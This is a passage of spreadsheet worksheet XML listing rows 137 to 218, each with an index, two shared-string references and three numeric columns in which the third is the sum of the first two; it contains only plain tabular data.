      <c r="B137" t="s">
        <v>276</v>
      </c>
      <c r="C137" t="s">
        <v>277</v>
      </c>
      <c r="D137">
        <v>2500</v>
      </c>
      <c r="E137">
        <v>1895</v>
      </c>
      <c r="F137">
        <v>4395</v>
      </c>
    </row>
    <row r="138" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>136</v>
      </c>
      <c r="B138" t="s">
        <v>278</v>
      </c>
      <c r="C138" t="s">
        <v>279</v>
      </c>
      <c r="D138">
        <v>5491</v>
      </c>
      <c r="E138">
        <v>4374</v>
      </c>
      <c r="F138">
        <v>9865</v>
      </c>
    </row>
    <row r="139" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>137</v>
      </c>
      <c r="B139" t="s">
        <v>280</v>
      </c>
      <c r="C139" t="s">
        <v>281</v>
      </c>
      <c r="D139">
        <v>5442</v>
      </c>
      <c r="E139">
        <v>7423</v>
      </c>
      <c r="F139">
        <v>12865</v>
      </c>
    </row>
    <row r="140" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>138</v>
      </c>
      <c r="B140" t="s">
        <v>282</v>
      </c>
      <c r="C140" t="s">
        <v>283</v>
      </c>
      <c r="D140">
        <v>4109</v>
      </c>
      <c r="E140">
        <v>2426</v>
      </c>
      <c r="F140">
        <v>6535</v>
      </c>
    </row>
    <row r="141" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>139</v>
      </c>
      <c r="B141" t="s">
        <v>284</v>
      </c>
      <c r="C141" t="s">
        <v>285</v>
      </c>
      <c r="D141">
        <v>4576</v>
      </c>
      <c r="E141">
        <v>1348</v>
      </c>
      <c r="F141">
        <v>5924</v>
      </c>
    </row>
    <row r="142" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>140</v>
      </c>
      <c r="B142" t="s">
        <v>286</v>
      </c>
      <c r="C142" t="s">
        <v>287</v>
      </c>
      <c r="D142">
        <v>16506</v>
      </c>
      <c r="E142">
        <v>2557</v>
      </c>
      <c r="F142">
        <v>19063</v>
      </c>
    </row>
    <row r="143" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>141</v>
      </c>
      <c r="B143" t="s">
        <v>288</v>
      </c>
      <c r="C143" t="s">
        <v>289</v>
      </c>
      <c r="D143">
        <v>5722</v>
      </c>
      <c r="E143">
        <v>2470</v>
      </c>
      <c r="F143">
        <v>8192</v>
      </c>
    </row>
    <row r="144" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>142</v>
      </c>
      <c r="B144" t="s">
        <v>290</v>
      </c>
      <c r="C144" t="s">
        <v>291</v>
      </c>
      <c r="D144">
        <v>16602</v>
      </c>
      <c r="E144">
        <v>2035</v>
      </c>
      <c r="F144">
        <v>18637</v>
      </c>
    </row>
    <row r="145" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>143</v>
      </c>
      <c r="B145" t="s">
        <v>292</v>
      </c>
      <c r="C145" t="s">
        <v>293</v>
      </c>
      <c r="D145">
        <v>9824</v>
      </c>
      <c r="E145">
        <v>1135</v>
      </c>
      <c r="F145">
        <v>10959</v>
      </c>
    </row>
    <row r="146" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>144</v>
      </c>
      <c r="B146" t="s">
        <v>294</v>
      </c>
      <c r="C146" t="s">
        <v>295</v>
      </c>
      <c r="D146">
        <v>2794</v>
      </c>
      <c r="E146">
        <v>2457</v>
      </c>
      <c r="F146">
        <v>5251</v>
      </c>
    </row>
    <row r="147" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A147">
        <v>145</v>
      </c>
      <c r="B147" t="s">
        <v>296</v>
      </c>
      <c r="C147" t="s">
        <v>297</v>
      </c>
      <c r="D147">
        <v>8749</v>
      </c>
      <c r="E147">
        <v>1709</v>
      </c>
      <c r="F147">
        <v>10458</v>
      </c>
    </row>
    <row r="148" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A148">
        <v>146</v>
      </c>
      <c r="B148" t="s">
        <v>298</v>
      </c>
      <c r="C148" t="s">
        <v>299</v>
      </c>
      <c r="D148">
        <v>8822</v>
      </c>
      <c r="E148">
        <v>1903</v>
      </c>
      <c r="F148">
        <v>10725</v>
      </c>
    </row>
    <row r="149" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A149">
        <v>147</v>
      </c>
      <c r="B149" t="s">
        <v>300</v>
      </c>
      <c r="C149" t="s">
        <v>301</v>
      </c>
      <c r="D149">
        <v>20515</v>
      </c>
      <c r="E149">
        <v>2464</v>
      </c>
      <c r="F149">
        <v>22979</v>
      </c>
    </row>
    <row r="150" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A150">
        <v>148</v>
      </c>
      <c r="B150" t="s">
        <v>302</v>
      </c>
      <c r="C150" t="s">
        <v>303</v>
      </c>
      <c r="D150">
        <v>9001</v>
      </c>
      <c r="E150">
        <v>3967</v>
      </c>
      <c r="F150">
        <v>12968</v>
      </c>
    </row>
    <row r="151" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A151">
        <v>149</v>
      </c>
      <c r="B151" t="s">
        <v>304</v>
      </c>
      <c r="C151" t="s">
        <v>305</v>
      </c>
      <c r="D151">
        <v>1647</v>
      </c>
      <c r="E151">
        <v>764</v>
      </c>
      <c r="F151">
        <v>2411</v>
      </c>
    </row>
    <row r="152" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A152">
        <v>150</v>
      </c>
      <c r="B152" t="s">
        <v>306</v>
      </c>
      <c r="C152" t="s">
        <v>307</v>
      </c>
      <c r="D152">
        <v>4171</v>
      </c>
      <c r="E152">
        <v>4694</v>
      </c>
      <c r="F152">
        <v>8865</v>
      </c>
    </row>
    <row r="153" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A153">
        <v>151</v>
      </c>
      <c r="B153" t="s">
        <v>308</v>
      </c>
      <c r="C153" t="s">
        <v>309</v>
      </c>
      <c r="D153">
        <v>6079</v>
      </c>
      <c r="E153">
        <v>1176</v>
      </c>
      <c r="F153">
        <v>7255</v>
      </c>
    </row>
    <row r="154" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A154">
        <v>152</v>
      </c>
      <c r="B154" t="s">
        <v>310</v>
      </c>
      <c r="C154" t="s">
        <v>311</v>
      </c>
      <c r="D154">
        <v>6333</v>
      </c>
      <c r="E154">
        <v>1133</v>
      </c>
      <c r="F154">
        <v>7466</v>
      </c>
    </row>
    <row r="155" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A155">
        <v>153</v>
      </c>
      <c r="B155" t="s">
        <v>312</v>
      </c>
      <c r="C155" t="s">
        <v>313</v>
      </c>
      <c r="D155">
        <v>1714</v>
      </c>
      <c r="E155">
        <v>1403</v>
      </c>
      <c r="F155">
        <v>3117</v>
      </c>
    </row>
    <row r="156" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A156">
        <v>154</v>
      </c>
      <c r="B156" t="s">
        <v>314</v>
      </c>
      <c r="C156" t="s">
        <v>315</v>
      </c>
      <c r="D156">
        <v>5302</v>
      </c>
      <c r="E156">
        <v>4562</v>
      </c>
      <c r="F156">
        <v>9864</v>
      </c>
    </row>
    <row r="157" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A157">
        <v>155</v>
      </c>
      <c r="B157" t="s">
        <v>316</v>
      </c>
      <c r="C157" t="s">
        <v>317</v>
      </c>
      <c r="D157">
        <v>6410</v>
      </c>
      <c r="E157">
        <v>1715</v>
      </c>
      <c r="F157">
        <v>8125</v>
      </c>
    </row>
    <row r="158" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A158">
        <v>156</v>
      </c>
      <c r="B158" t="s">
        <v>318</v>
      </c>
      <c r="C158" t="s">
        <v>319</v>
      </c>
      <c r="D158">
        <v>3601</v>
      </c>
      <c r="E158">
        <v>4192</v>
      </c>
      <c r="F158">
        <v>7793</v>
      </c>
    </row>
    <row r="159" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A159">
        <v>157</v>
      </c>
      <c r="B159" t="s">
        <v>320</v>
      </c>
      <c r="C159" t="s">
        <v>321</v>
      </c>
      <c r="D159">
        <v>7036</v>
      </c>
      <c r="E159">
        <v>3826</v>
      </c>
      <c r="F159">
        <v>10862</v>
      </c>
    </row>
    <row r="160" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A160">
        <v>158</v>
      </c>
      <c r="B160" t="s">
        <v>322</v>
      </c>
      <c r="C160" t="s">
        <v>323</v>
      </c>
      <c r="D160">
        <v>10266</v>
      </c>
      <c r="E160">
        <v>1168</v>
      </c>
      <c r="F160">
        <v>11434</v>
      </c>
    </row>
    <row r="161" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A161">
        <v>159</v>
      </c>
      <c r="B161" t="s">
        <v>324</v>
      </c>
      <c r="C161" t="s">
        <v>325</v>
      </c>
      <c r="D161">
        <v>3254</v>
      </c>
      <c r="E161">
        <v>3122</v>
      </c>
      <c r="F161">
        <v>6376</v>
      </c>
    </row>
    <row r="162" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A162">
        <v>160</v>
      </c>
      <c r="B162" t="s">
        <v>326</v>
      </c>
      <c r="C162" t="s">
        <v>327</v>
      </c>
      <c r="D162">
        <v>16600</v>
      </c>
      <c r="E162">
        <v>2186</v>
      </c>
      <c r="F162">
        <v>18786</v>
      </c>
    </row>
    <row r="163" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A163">
        <v>161</v>
      </c>
      <c r="B163" t="s">
        <v>328</v>
      </c>
      <c r="C163" t="s">
        <v>329</v>
      </c>
      <c r="D163">
        <v>16556</v>
      </c>
      <c r="E163">
        <v>872</v>
      </c>
      <c r="F163">
        <v>17428</v>
      </c>
    </row>
    <row r="164" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A164">
        <v>162</v>
      </c>
      <c r="B164" t="s">
        <v>330</v>
      </c>
      <c r="C164" t="s">
        <v>331</v>
      </c>
      <c r="D164">
        <v>10897</v>
      </c>
      <c r="E164">
        <v>1995</v>
      </c>
      <c r="F164">
        <v>12892</v>
      </c>
    </row>
    <row r="165" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A165">
        <v>163</v>
      </c>
      <c r="B165" t="s">
        <v>332</v>
      </c>
      <c r="C165" t="s">
        <v>333</v>
      </c>
      <c r="D165">
        <v>5051</v>
      </c>
      <c r="E165">
        <v>2228</v>
      </c>
      <c r="F165">
        <v>7279</v>
      </c>
    </row>
    <row r="166" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A166">
        <v>164</v>
      </c>
      <c r="B166" t="s">
        <v>334</v>
      </c>
      <c r="C166" t="s">
        <v>335</v>
      </c>
      <c r="D166">
        <v>6577</v>
      </c>
      <c r="E166">
        <v>3188</v>
      </c>
      <c r="F166">
        <v>9765</v>
      </c>
    </row>
    <row r="167" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A167">
        <v>165</v>
      </c>
      <c r="B167" t="s">
        <v>336</v>
      </c>
      <c r="C167" t="s">
        <v>337</v>
      </c>
      <c r="D167">
        <v>11432</v>
      </c>
      <c r="E167">
        <v>1846</v>
      </c>
      <c r="F167">
        <v>13278</v>
      </c>
    </row>
    <row r="168" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A168">
        <v>166</v>
      </c>
      <c r="B168" t="s">
        <v>338</v>
      </c>
      <c r="C168" t="s">
        <v>339</v>
      </c>
      <c r="D168">
        <v>4051</v>
      </c>
      <c r="E168">
        <v>1548</v>
      </c>
      <c r="F168">
        <v>5599</v>
      </c>
    </row>
    <row r="169" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A169">
        <v>167</v>
      </c>
      <c r="B169" t="s">
        <v>340</v>
      </c>
      <c r="C169" t="s">
        <v>341</v>
      </c>
      <c r="D169">
        <v>3343</v>
      </c>
      <c r="E169">
        <v>3610</v>
      </c>
      <c r="F169">
        <v>6953</v>
      </c>
    </row>
    <row r="170" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A170">
        <v>168</v>
      </c>
      <c r="B170" t="s">
        <v>342</v>
      </c>
      <c r="C170" t="s">
        <v>343</v>
      </c>
      <c r="D170">
        <v>6824</v>
      </c>
      <c r="E170">
        <v>3769</v>
      </c>
      <c r="F170">
        <v>10593</v>
      </c>
    </row>
    <row r="171" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A171">
        <v>169</v>
      </c>
      <c r="B171" t="s">
        <v>344</v>
      </c>
      <c r="C171" t="s">
        <v>345</v>
      </c>
      <c r="D171">
        <v>3440</v>
      </c>
      <c r="E171">
        <v>3416</v>
      </c>
      <c r="F171">
        <v>6856</v>
      </c>
    </row>
    <row r="172" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A172">
        <v>170</v>
      </c>
      <c r="B172" t="s">
        <v>346</v>
      </c>
      <c r="C172" t="s">
        <v>347</v>
      </c>
      <c r="D172">
        <v>8360</v>
      </c>
      <c r="E172">
        <v>1898</v>
      </c>
      <c r="F172">
        <v>10258</v>
      </c>
    </row>
    <row r="173" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A173">
        <v>171</v>
      </c>
      <c r="B173" t="s">
        <v>348</v>
      </c>
      <c r="C173" t="s">
        <v>349</v>
      </c>
      <c r="D173">
        <v>8432</v>
      </c>
      <c r="E173">
        <v>2023</v>
      </c>
      <c r="F173">
        <v>10455</v>
      </c>
    </row>
    <row r="174" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A174">
        <v>172</v>
      </c>
      <c r="B174" t="s">
        <v>350</v>
      </c>
      <c r="C174" t="s">
        <v>351</v>
      </c>
      <c r="D174">
        <v>8085</v>
      </c>
      <c r="E174">
        <v>3957</v>
      </c>
      <c r="F174">
        <v>12042</v>
      </c>
    </row>
    <row r="175" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A175">
        <v>173</v>
      </c>
      <c r="B175" t="s">
        <v>352</v>
      </c>
      <c r="C175" t="s">
        <v>353</v>
      </c>
      <c r="D175">
        <v>3638</v>
      </c>
      <c r="E175">
        <v>1335</v>
      </c>
      <c r="F175">
        <v>4973</v>
      </c>
    </row>
    <row r="176" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A176">
        <v>174</v>
      </c>
      <c r="B176" t="s">
        <v>354</v>
      </c>
      <c r="C176" t="s">
        <v>319</v>
      </c>
      <c r="D176">
        <v>3601</v>
      </c>
      <c r="E176">
        <v>4212</v>
      </c>
      <c r="F176">
        <v>7813</v>
      </c>
    </row>
    <row r="177" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A177">
        <v>175</v>
      </c>
      <c r="B177" t="s">
        <v>355</v>
      </c>
      <c r="C177" t="s">
        <v>356</v>
      </c>
      <c r="D177">
        <v>22047</v>
      </c>
      <c r="E177">
        <v>1780</v>
      </c>
      <c r="F177">
        <v>23827</v>
      </c>
    </row>
    <row r="178" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A178">
        <v>176</v>
      </c>
      <c r="B178" t="s">
        <v>357</v>
      </c>
      <c r="C178" t="s">
        <v>358</v>
      </c>
      <c r="D178">
        <v>2903</v>
      </c>
      <c r="E178">
        <v>2490</v>
      </c>
      <c r="F178">
        <v>5393</v>
      </c>
    </row>
    <row r="179" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A179">
        <v>177</v>
      </c>
      <c r="B179" t="s">
        <v>359</v>
      </c>
      <c r="C179" t="s">
        <v>360</v>
      </c>
      <c r="D179">
        <v>4110</v>
      </c>
      <c r="E179">
        <v>1947</v>
      </c>
      <c r="F179">
        <v>6057</v>
      </c>
    </row>
    <row r="180" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A180">
        <v>178</v>
      </c>
      <c r="B180" t="s">
        <v>361</v>
      </c>
      <c r="C180" t="s">
        <v>362</v>
      </c>
      <c r="D180">
        <v>6827</v>
      </c>
      <c r="E180">
        <v>1509</v>
      </c>
      <c r="F180">
        <v>8336</v>
      </c>
    </row>
    <row r="181" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A181">
        <v>179</v>
      </c>
      <c r="B181" t="s">
        <v>363</v>
      </c>
      <c r="C181" t="s">
        <v>364</v>
      </c>
      <c r="D181">
        <v>5080</v>
      </c>
      <c r="E181">
        <v>1940</v>
      </c>
      <c r="F181">
        <v>7020</v>
      </c>
    </row>
    <row r="182" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A182">
        <v>180</v>
      </c>
      <c r="B182" t="s">
        <v>365</v>
      </c>
      <c r="C182" t="s">
        <v>366</v>
      </c>
      <c r="D182">
        <v>10809</v>
      </c>
      <c r="E182">
        <v>2693</v>
      </c>
      <c r="F182">
        <v>13502</v>
      </c>
    </row>
    <row r="183" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A183">
        <v>181</v>
      </c>
      <c r="B183" t="s">
        <v>367</v>
      </c>
      <c r="C183" t="s">
        <v>368</v>
      </c>
      <c r="D183">
        <v>5004</v>
      </c>
      <c r="E183">
        <v>2462</v>
      </c>
      <c r="F183">
        <v>7466</v>
      </c>
    </row>
    <row r="184" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A184">
        <v>182</v>
      </c>
      <c r="B184" t="s">
        <v>369</v>
      </c>
      <c r="C184" t="s">
        <v>370</v>
      </c>
      <c r="D184">
        <v>6592</v>
      </c>
      <c r="E184">
        <v>3143</v>
      </c>
      <c r="F184">
        <v>9735</v>
      </c>
    </row>
    <row r="185" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A185">
        <v>183</v>
      </c>
      <c r="B185" t="s">
        <v>371</v>
      </c>
      <c r="C185" t="s">
        <v>372</v>
      </c>
      <c r="D185">
        <v>3904</v>
      </c>
      <c r="E185">
        <v>1740</v>
      </c>
      <c r="F185">
        <v>5644</v>
      </c>
    </row>
    <row r="186" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A186">
        <v>184</v>
      </c>
      <c r="B186" t="s">
        <v>373</v>
      </c>
      <c r="C186" t="s">
        <v>374</v>
      </c>
      <c r="D186">
        <v>11994</v>
      </c>
      <c r="E186">
        <v>3395</v>
      </c>
      <c r="F186">
        <v>15389</v>
      </c>
    </row>
    <row r="187" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A187">
        <v>185</v>
      </c>
      <c r="B187" t="s">
        <v>375</v>
      </c>
      <c r="C187" t="s">
        <v>376</v>
      </c>
      <c r="D187">
        <v>6889</v>
      </c>
      <c r="E187">
        <v>1026</v>
      </c>
      <c r="F187">
        <v>7915</v>
      </c>
    </row>
    <row r="188" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A188">
        <v>186</v>
      </c>
      <c r="B188" t="s">
        <v>377</v>
      </c>
      <c r="C188" t="s">
        <v>378</v>
      </c>
      <c r="D188">
        <v>7904</v>
      </c>
      <c r="E188">
        <v>2416</v>
      </c>
      <c r="F188">
        <v>10320</v>
      </c>
    </row>
    <row r="189" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A189">
        <v>187</v>
      </c>
      <c r="B189" t="s">
        <v>379</v>
      </c>
      <c r="C189" t="s">
        <v>380</v>
      </c>
      <c r="D189">
        <v>2168</v>
      </c>
      <c r="E189">
        <v>1893</v>
      </c>
      <c r="F189">
        <v>4061</v>
      </c>
    </row>
    <row r="190" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A190">
        <v>188</v>
      </c>
      <c r="B190" t="s">
        <v>381</v>
      </c>
      <c r="C190" t="s">
        <v>382</v>
      </c>
      <c r="D190">
        <v>2033</v>
      </c>
      <c r="E190">
        <v>1772</v>
      </c>
      <c r="F190">
        <v>3805</v>
      </c>
    </row>
    <row r="191" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A191">
        <v>189</v>
      </c>
      <c r="B191" t="s">
        <v>383</v>
      </c>
      <c r="C191" t="s">
        <v>384</v>
      </c>
      <c r="D191">
        <v>3337</v>
      </c>
      <c r="E191">
        <v>3451</v>
      </c>
      <c r="F191">
        <v>6788</v>
      </c>
    </row>
    <row r="192" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A192">
        <v>190</v>
      </c>
      <c r="B192" t="s">
        <v>385</v>
      </c>
      <c r="C192" t="s">
        <v>386</v>
      </c>
      <c r="D192">
        <v>7931</v>
      </c>
      <c r="E192">
        <v>2583</v>
      </c>
      <c r="F192">
        <v>10514</v>
      </c>
    </row>
    <row r="193" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A193">
        <v>191</v>
      </c>
      <c r="B193" t="s">
        <v>387</v>
      </c>
      <c r="C193" t="s">
        <v>388</v>
      </c>
      <c r="D193">
        <v>2846</v>
      </c>
      <c r="E193">
        <v>2919</v>
      </c>
      <c r="F193">
        <v>5765</v>
      </c>
    </row>
    <row r="194" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A194">
        <v>192</v>
      </c>
      <c r="B194" t="s">
        <v>389</v>
      </c>
      <c r="C194" t="s">
        <v>390</v>
      </c>
      <c r="D194">
        <v>5567</v>
      </c>
      <c r="E194">
        <v>4121</v>
      </c>
      <c r="F194">
        <v>9688</v>
      </c>
    </row>
    <row r="195" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A195">
        <v>193</v>
      </c>
      <c r="B195" t="s">
        <v>391</v>
      </c>
      <c r="C195" t="s">
        <v>392</v>
      </c>
      <c r="D195">
        <v>13594</v>
      </c>
      <c r="E195">
        <v>3614</v>
      </c>
      <c r="F195">
        <v>17208</v>
      </c>
    </row>
    <row r="196" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A196">
        <v>194</v>
      </c>
      <c r="B196" t="s">
        <v>393</v>
      </c>
      <c r="C196" t="s">
        <v>394</v>
      </c>
      <c r="D196">
        <v>15276</v>
      </c>
      <c r="E196">
        <v>3492</v>
      </c>
      <c r="F196">
        <v>18768</v>
      </c>
    </row>
    <row r="197" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A197">
        <v>195</v>
      </c>
      <c r="B197" t="s">
        <v>395</v>
      </c>
      <c r="C197" t="s">
        <v>396</v>
      </c>
      <c r="D197">
        <v>4810</v>
      </c>
      <c r="E197">
        <v>1067</v>
      </c>
      <c r="F197">
        <v>5877</v>
      </c>
    </row>
    <row r="198" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A198">
        <v>196</v>
      </c>
      <c r="B198" t="s">
        <v>397</v>
      </c>
      <c r="C198" t="s">
        <v>398</v>
      </c>
      <c r="D198">
        <v>35625</v>
      </c>
      <c r="E198">
        <v>3500</v>
      </c>
      <c r="F198">
        <v>39125</v>
      </c>
    </row>
    <row r="199" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A199">
        <v>197</v>
      </c>
      <c r="B199" t="s">
        <v>399</v>
      </c>
      <c r="C199" t="s">
        <v>400</v>
      </c>
      <c r="D199">
        <v>6436</v>
      </c>
      <c r="E199">
        <v>8160</v>
      </c>
      <c r="F199">
        <v>14596</v>
      </c>
    </row>
    <row r="200" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A200">
        <v>198</v>
      </c>
      <c r="B200" t="s">
        <v>401</v>
      </c>
      <c r="C200" t="s">
        <v>402</v>
      </c>
      <c r="D200">
        <v>22479</v>
      </c>
      <c r="E200">
        <v>5402</v>
      </c>
      <c r="F200">
        <v>27881</v>
      </c>
    </row>
    <row r="201" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A201">
        <v>199</v>
      </c>
      <c r="B201" t="s">
        <v>403</v>
      </c>
      <c r="C201" t="s">
        <v>404</v>
      </c>
      <c r="D201">
        <v>8666</v>
      </c>
      <c r="E201">
        <v>4152</v>
      </c>
      <c r="F201">
        <v>12818</v>
      </c>
    </row>
    <row r="202" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A202">
        <v>200</v>
      </c>
      <c r="B202" t="s">
        <v>405</v>
      </c>
      <c r="C202" t="s">
        <v>406</v>
      </c>
      <c r="D202">
        <v>6454</v>
      </c>
      <c r="E202">
        <v>2147</v>
      </c>
      <c r="F202">
        <v>8601</v>
      </c>
    </row>
    <row r="203" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A203">
        <v>201</v>
      </c>
      <c r="B203" t="s">
        <v>407</v>
      </c>
      <c r="C203" t="s">
        <v>408</v>
      </c>
      <c r="D203">
        <v>6792</v>
      </c>
      <c r="E203">
        <v>4806</v>
      </c>
      <c r="F203">
        <v>11598</v>
      </c>
    </row>
    <row r="204" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A204">
        <v>202</v>
      </c>
      <c r="C204" t="s">
        <v>409</v>
      </c>
      <c r="D204">
        <v>10190</v>
      </c>
      <c r="E204">
        <v>8192</v>
      </c>
      <c r="F204">
        <v>18382</v>
      </c>
    </row>
    <row r="205" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A205">
        <v>203</v>
      </c>
      <c r="B205" t="s">
        <v>410</v>
      </c>
      <c r="C205" t="s">
        <v>411</v>
      </c>
      <c r="D205">
        <v>3123</v>
      </c>
      <c r="E205">
        <v>1036</v>
      </c>
      <c r="F205">
        <v>4159</v>
      </c>
    </row>
    <row r="206" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A206">
        <v>204</v>
      </c>
      <c r="B206" t="s">
        <v>412</v>
      </c>
      <c r="C206" t="s">
        <v>413</v>
      </c>
      <c r="D206">
        <v>17835</v>
      </c>
      <c r="E206">
        <v>1256</v>
      </c>
      <c r="F206">
        <v>19091</v>
      </c>
    </row>
    <row r="207" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A207">
        <v>205</v>
      </c>
      <c r="B207" t="s">
        <v>414</v>
      </c>
      <c r="C207" t="s">
        <v>415</v>
      </c>
      <c r="D207">
        <v>4515</v>
      </c>
      <c r="E207">
        <v>1945</v>
      </c>
      <c r="F207">
        <v>6460</v>
      </c>
    </row>
    <row r="208" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A208">
        <v>206</v>
      </c>
      <c r="B208" t="s">
        <v>416</v>
      </c>
      <c r="C208" t="s">
        <v>417</v>
      </c>
      <c r="D208">
        <v>24237</v>
      </c>
      <c r="E208">
        <v>5020</v>
      </c>
      <c r="F208">
        <v>29257</v>
      </c>
    </row>
    <row r="209" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A209">
        <v>207</v>
      </c>
      <c r="B209" t="s">
        <v>418</v>
      </c>
      <c r="C209" t="s">
        <v>419</v>
      </c>
      <c r="D209">
        <v>3817</v>
      </c>
      <c r="E209">
        <v>634</v>
      </c>
      <c r="F209">
        <v>4451</v>
      </c>
    </row>
    <row r="210" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A210">
        <v>208</v>
      </c>
      <c r="B210" t="s">
        <v>420</v>
      </c>
      <c r="C210" t="s">
        <v>421</v>
      </c>
      <c r="D210">
        <v>8592</v>
      </c>
      <c r="E210">
        <v>4521</v>
      </c>
      <c r="F210">
        <v>13113</v>
      </c>
    </row>
    <row r="211" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A211">
        <v>209</v>
      </c>
      <c r="B211" t="s">
        <v>422</v>
      </c>
      <c r="C211" t="s">
        <v>423</v>
      </c>
      <c r="D211">
        <v>20103</v>
      </c>
      <c r="E211">
        <v>5245</v>
      </c>
      <c r="F211">
        <v>25348</v>
      </c>
    </row>
    <row r="212" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A212">
        <v>210</v>
      </c>
      <c r="B212" t="s">
        <v>424</v>
      </c>
      <c r="C212" t="s">
        <v>425</v>
      </c>
      <c r="D212">
        <v>3941</v>
      </c>
      <c r="E212">
        <v>3075</v>
      </c>
      <c r="F212">
        <v>7016</v>
      </c>
    </row>
    <row r="213" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A213">
        <v>211</v>
      </c>
      <c r="B213" t="s">
        <v>426</v>
      </c>
      <c r="C213" t="s">
        <v>427</v>
      </c>
      <c r="D213">
        <v>4165</v>
      </c>
      <c r="E213">
        <v>856</v>
      </c>
      <c r="F213">
        <v>5021</v>
      </c>
    </row>
    <row r="214" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A214">
        <v>212</v>
      </c>
      <c r="B214" t="s">
        <v>428</v>
      </c>
      <c r="C214" t="s">
        <v>429</v>
      </c>
      <c r="D214">
        <v>6524</v>
      </c>
      <c r="E214">
        <v>7406</v>
      </c>
      <c r="F214">
        <v>13930</v>
      </c>
    </row>
    <row r="215" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A215">
        <v>213</v>
      </c>
      <c r="B215" t="s">
        <v>430</v>
      </c>
      <c r="C215" t="s">
        <v>431</v>
      </c>
      <c r="D215">
        <v>9118</v>
      </c>
      <c r="E215">
        <v>1113</v>
      </c>
      <c r="F215">
        <v>10231</v>
      </c>
    </row>
    <row r="216" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A216">
        <v>214</v>
      </c>
      <c r="B216" t="s">
        <v>432</v>
      </c>
      <c r="C216" t="s">
        <v>433</v>
      </c>
      <c r="D216">
        <v>17460</v>
      </c>
      <c r="E216">
        <v>1004</v>
      </c>
      <c r="F216">
        <v>18464</v>
      </c>
    </row>
    <row r="217" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A217">
        <v>215</v>
      </c>
      <c r="B217" t="s">
        <v>434</v>
      </c>
      <c r="C217" t="s">
        <v>435</v>
      </c>
      <c r="D217">
        <v>10307</v>
      </c>
      <c r="E217">
        <v>1998</v>
      </c>
      <c r="F217">
        <v>12305</v>
      </c>
    </row>
    <row r="218" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A218">
        <v>216</v>
      </c>
      <c r="B218" t="s">
        <v>436</v>
      </c>
      <c r="C218" t="s">
        <v>437</v>
      </c>
      <c r="D218">
        <v>8087</v>
      </c>
      <c r="E218">
        <v>2715</v>
      </c>
      <c r="F218">
